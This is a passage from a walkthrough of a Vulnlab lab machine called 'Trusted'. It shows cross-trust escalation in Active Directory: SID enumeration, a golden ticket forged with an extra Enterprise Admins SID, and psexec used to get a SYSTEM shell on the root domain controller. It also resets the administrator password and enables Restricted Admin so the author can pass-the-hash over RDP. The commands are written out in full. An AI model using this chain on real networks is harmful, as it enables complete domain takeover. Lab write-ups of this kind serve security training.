krbtgt:aes128-cts-hmac-sha1-96:db0b41cedf222df3808858fc41bb0c02
krbtgt:des-cbc-md5:0e89167916c134ad
[*] Cleaning up... 

Get SID for the child domain

1
2
└─$ lookupsid.py LAB/Administrator:@10.10.195.214 -hashes ':<REDACTED>'| grep "Domain SID"
[*] Domain SID is: S-1-5-21-2241985869-2159962460-1278545866

Get SID of the Enterprise Admins group of the root domain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ lookupsid.py LAB/Administrator:@10.10.195.213 -hashes ':<REDACTED>'| grep -B12 "Enterprise Admins"
[*] Domain SID is: S-1-5-21-3576695518-347000760-3731839591
498: TRUSTED\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: TRUSTED\Administrator (SidTypeUser)
501: TRUSTED\Guest (SidTypeUser)
502: TRUSTED\krbtgt (SidTypeUser)
512: TRUSTED\Domain Admins (SidTypeGroup)
513: TRUSTED\Domain Users (SidTypeGroup)
514: TRUSTED\Domain Guests (SidTypeGroup)
515: TRUSTED\Domain Computers (SidTypeGroup)
516: TRUSTED\Domain Controllers (SidTypeGroup)
517: TRUSTED\Cert Publishers (SidTypeAlias)
518: TRUSTED\Schema Admins (SidTypeGroup)
519: TRUSTED\Enterprise Admins (SidTypeGroup)

Now we have:

  • The KRBTGT hash for the child domain: <REDACTED>
  • The SID for the child domain: S-1-5-21-2241985869-2159962460-1278545866
  • The name of a target user in the child domain (Any domain user): Administrator
  • The FQDN of the child domain: lab.trusted.vl
  • The SID of the Enterprise Admins group of the root domain: S-1-5-21-3576695518-347000760-3731839591-519

Let’s construct Golden ticket

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ ticketer.py -nthash <REDACTED> -domain lab.trusted.vl -domain-sid S-1-5-21-2241985869-2159962460-1278545866 -extra-sid S-1-5-21-3576695518-347000760-3731839591-519 Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for lab.trusted.vl/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache

And we pwn the root domain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─$ KRB5CCNAME=Administrator.ccache psexec.py lab.trusted.vl/Administrator@trusteddc.trusted.vl -k -no-pass -target-ip 10.10.195.213
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.195.213.....
[*] Found writable share ADMIN$
[*] Uploading file naBXSbgN.exe
[*] Opening SVCManager on 10.10.195.213.....
[*] Creating service pCeY on 10.10.195.213.....
[*] Starting service pCeY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

The attack can also be performed with raiseChild.py

But we can’t access the flag

1
2
C:\Users\Administrator\Desktop> type root.txt
Access is denied.

Let’s dump the hashes and connect as Administrator. We have permissions to read the file

1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\Administrator\desktop> get-acl root.txt |fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\desktop\root.txt
Owner  : BUILTIN\Administrators
Group  : TRUSTED\Domain Users
Access : NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         TRUSTED\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:DUD:(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)

Then someone hinted that file is encrypted

1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\Administrator\desktop> CIPHER /u /n

Encrypted File(s) on your system:

C:\Documents and Settings\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt

In order to read it we have to can use RunasCs, but it will require password change for administrator

1
2
3
*Evil-WinRM* PS C:\Users\Administrator\desktop> net user administrator "P@ssw0rd!"
The command completed successfully.

1
*Evil-WinRM* PS C:\ProgramData>  .\runascs.exe administrator P@ssw0rd! "cmd.exe /c type C:\Users\Administrator\desktop\root.txt"

Another way to do it via RDP, but first we have to enable PTH authentication for Administrator accounts, since it is disabled by default

1
2
3
*Evil-WinRM* PS C:\Users\Administrator\desktop> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
The operation completed successfully.

Now we can connect via rdp and get the flag

1
2
└─$ xfreerdp /v:10.10.195.213 /u:Administrator /pth:'<REDACTED>' 

https://api.vulnlab.com/api/v1/share?id=ebd21ef5-7230-437a-8093-55558af39522

This post is licensed under CC BY 4.0 by the author.